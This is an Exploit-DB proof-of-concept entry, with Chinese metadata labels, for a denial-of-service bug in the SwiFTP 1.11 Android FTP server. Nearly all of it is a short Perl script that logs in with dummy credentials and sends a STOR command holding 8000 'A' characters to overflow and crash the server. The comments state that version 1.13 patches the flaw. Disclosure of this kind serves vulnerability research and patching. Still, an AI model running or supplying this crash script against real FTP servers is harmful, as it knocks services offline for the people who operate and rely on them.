SwiFTP 1.11 – Overflow (Denial of Service) (PoC)

  • 作者: Julien Bedard
    日期: 2010-01-13
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/11125/
  • # Exploit Title: SwiFTP v1.11 Overflow Dos PoC
    # Software Link: http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
    # Version: v1.11
    # Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)
    # Simple Dos Crap for the Android app : SwiFTP Server v1.11
    # by Julien Bedard
    # This DoS have been patched in the new version that's why
    # I'm releasing it. 
    # SwiFTP Server v1.11 --> Vulnerable
    # SwiFTP Server v1.13 --> Patched
    use IO::Socket::INET;
    $overflow = 'A' x 8000;
    $ftpraw=IO::Socket::INET->new("") or die;
    print $ftpraw "user nouser\n";
    print $ftpraw "pass nopass\n";
    print $ftpraw "stor $overflow\n";
    print $ftpraw "QUIT\n";
    close $ftpraw;